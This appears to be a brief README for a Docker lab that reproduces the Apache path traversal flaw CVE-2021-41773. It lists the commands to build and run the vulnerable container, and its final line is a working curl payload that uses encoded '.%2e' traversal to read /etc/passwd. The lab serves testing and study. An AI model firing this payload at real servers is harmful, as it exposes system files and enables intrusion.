
CVE-2021-41773 exploit PoC with Docker setup.
CD into the directory containing the Apache configuration and Dockerfile (shared in repo).
Building Image: ~# docker build -t cve-2021-41773:1.0 .
Running the Docker Image: ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (Note: You can also use Image ID instead of image name, find Image details using command 'docker images')
Test service: ~# curl localhost:4444
Exploit service: ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd